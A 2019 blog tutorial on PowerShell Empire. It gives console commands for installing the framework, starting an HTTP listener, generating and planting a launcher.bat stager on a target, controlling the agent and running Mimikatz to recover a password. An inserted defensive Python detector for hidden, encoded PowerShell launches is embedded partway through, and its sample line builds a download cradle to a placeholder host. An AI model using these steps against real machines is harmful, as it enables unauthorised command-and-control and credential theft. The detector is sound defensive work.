July 09, 2019

Powershell Empire: Hands on practical guide

Hello my dear readers, in this article I am going to introduce you to a very powerful PowerShell tool called "Empire". PowerShell Empire is a post-exploitation framework that is mostly used against computers and servers running Microsoft Windows and Windows Server operating systems. Its agent communications are cryptographically protected, and it provides a flexible, modular architecture.

The best part of PowerShell Empire is that it can run a PowerShell agent without needing powershell.exe. It is broadly similar to Metasploit and Meterpreter, except that Empire is used as a command-and-control (C2) tool, which lets the operator control a compromised PC more efficiently.

Components of Empire:

Listener: The listener is a process on the attacker's system that waits for connections from the target system; the agent sends its loot (exfiltrated data) back through it.

Stager: A stager is a small snippet of code that is delivered to the compromised system and launches the agent there.

Agent: An agent is a piece of code that maintains the connection between your system and the compromised host and executes the tasks you send it.

Module: Modules are what execute commands on the host, harvest credentials, escalate privileges, and carry out whatever other post-exploitation task is intended.

Installation of Empire framework:

# Download the repository
git clone https://github.com/EmpireProject/Empire.git
# Install Empire
sudo bash ./Empire/setup/install.sh
# Start the Empire console
cd Empire
sudo ./empire

Note: If it throws errors at startup, go to the setup directory and run the ./reset.sh script. That should resolve the issue.
The window below is what you will see once the Empire console has opened successfully.
Type the help command to learn more about the commands that are available.

We will start with the creation of a listener. The listener is simply the component that runs inside the command-and-control server and waits for the compromised host to connect to it.
Enter the commands below to create a listener.

# Enter the listeners menu
listeners

# View available listener types
uselistener <TAB>

# Create a listener (in this article we will use the http listener)
uselistener http

Once we have selected the listener we want to create, enter "info" to display the available options.

You will see the available parameters with their default values. If you want, you can change them with the set command, just like in Metasploit.

Once we are satisfied with the settings, we type the execute command to start the listener.

As in Metasploit, we can easily create payloads in Empire to connect back from the host. To view the available payloads (stagers) in Empire, type the command below.

# View all payload types
usestager <TAB>

In this article we will choose windows/launcher_bat.

usestager windows/launcher_bat

Type "info" to see the available fields and their default values.

If everything is set, type the execute command and hit Enter to generate the stager.

Now copy the generated launcher.bat file to the targeted system, execute it there, and come back to the Empire console.

If our system is reachable from the targeted host, we will receive a connection back to Empire.

To see the connection, type the "agents" command to list the available agents. Sometimes it takes a few minutes for the connection to appear.
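From the defender's side, the step above (a launcher.bat stager starting a hidden, encoded PowerShell process that calls back to the listener) is also the point where the activity is most visible in process-creation telemetry. As an added example that is not part of the original article or of the Empire project, the following Python script analyses command lines of the kind logged by Sysmon Event ID 1 or Windows Event 4688, decodes any -EncodedCommand payload (base64 of UTF-16LE text) and scores the launch. The sample command lines are constructed for this example; the flag sequence `-noP -sta -w 1 -enc` in the first sample is an assumption about the typical shape of such launchers, and the example.invalid URL is a placeholder.

```python
import base64
import binascii
from dataclasses import dataclass, field
from typing import List, Optional

# Full parameter names. PowerShell accepts any unambiguous prefix (-noP, -w, -enc ...),
# so we match by prefix. Order matters for the ambiguous "-e" (treated as EncodedCommand).
PARAMS = ["noprofile", "windowstyle", "encodedcommand", "executionpolicy", "noninteractive"]

# Substrings in a decoded script that commonly indicate a download-and-execute cradle.
SCRIPT_INDICATORS = ["net.webclient", "downloadstring", "downloaddata",
                     "invoke-expression", "iex", "frombase64string"]


@dataclass
class Finding:
    is_powershell: bool
    no_profile: bool = False
    hidden_window: bool = False
    encoded: bool = False
    decoded_script: Optional[str] = None
    indicators: List[str] = field(default_factory=list)
    verdict: str = "low"


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines (not captured from a real incident).
SAMPLE_COMMAND_LINES = [
    # Hidden window, no profile, encoded: the shape a launcher.bat stager produces (assumption)
    "powershell -noP -sta -w 1 -enc " + _encode_ps(
        "$wc=New-Object System.Net.WebClient;$wc.DownloadString('http://example.invalid/')"),
    # Administrator running a script interactively: visible window, nothing encoded
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Encoded but harmless content and a visible window
    "powershell.exe -EncodedCommand " + _encode_ps("Get-Date"),
    # Not PowerShell at all
    "notepad.exe C:\\Users\\alice\\notes.txt",
]


def _param_name(token: str) -> Optional[str]:
    """Resolve an abbreviated switch like -noP to its full parameter name, or None."""
    if not token.startswith("-") or len(token) < 2:
        return None
    stem = token[1:].lower()
    for full in PARAMS:
        if full.startswith(stem):
            return full
    return None


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand argument; return None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(cmdline: str) -> Finding:
    """Score one process command line for the hidden/encoded PowerShell launch pattern."""
    tokens = cmdline.split()
    if not tokens:
        return Finding(is_powershell=False)
    exe = tokens[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
        return Finding(is_powershell=False)
    f = Finding(is_powershell=True)
    i = 1
    while i < len(tokens):
        name = _param_name(tokens[i])
        value = tokens[i + 1] if i + 1 < len(tokens) else ""
        if name == "noprofile":
            f.no_profile = True
        elif name == "windowstyle":          # WindowStyle 1 == Hidden
            f.hidden_window = value.lower() in ("1", "hidden")
            i += 1
        elif name == "encodedcommand":
            f.encoded = True
            f.decoded_script = decode_encoded_command(value)
            i += 1
        i += 1
    if f.decoded_script:
        lowered = f.decoded_script.lower()
        f.indicators = [s for s in SCRIPT_INDICATORS if s in lowered]
    # Encoded plus hidden window, or encoded plus a download cradle, is the high-risk shape.
    if f.encoded and (f.hidden_window or f.indicators):
        f.verdict = "high"
    elif f.encoded or f.hidden_window:
        f.verdict = "medium"
    return f


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = analyze(line)
        print(f"{r.verdict:6} hidden={r.hidden_window} encoded={r.encoded} "
              f"indicators={r.indicators} :: {line[:60]}")
```

The decoded script is what a PowerShell script block log (Event ID 4104) would also show, so the same indicator list can be reused there; the prefix matching on switch names matters because abbreviated flags defeat naive string matches on "-EncodedCommand".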

Now enter "help" to see all the options available for communicating with the compromised host.

We will use the interact command with the agent name to connect to the targeted host:

interact E9Y42CU3

Once inside the host, type "help" to see more options that are available against the compromised host.

Let's start with the "info" command to get all the details about the target.

Next we will type "sysinfo" to get the system information.

We do not stop at basic information; let's try Mimikatz, which is known as one of the most powerful post-exploitation tools.

# To launch Mimikatz, type
mimikatz

Here in the output we have successfully obtained the password (12345) of the compromised host. We can get a lot of other information as well, but let's not discuss that here; I will write a separate article on this in an upcoming blog post.

You can do much more with PowerShell Empire. Look it up on Google, GitHub and the project's wiki page for more.

I hope you enjoyed this article. Please do share it and let me know your feedback and other queries in the comment section. See you in my next article. Happy Hacking!!
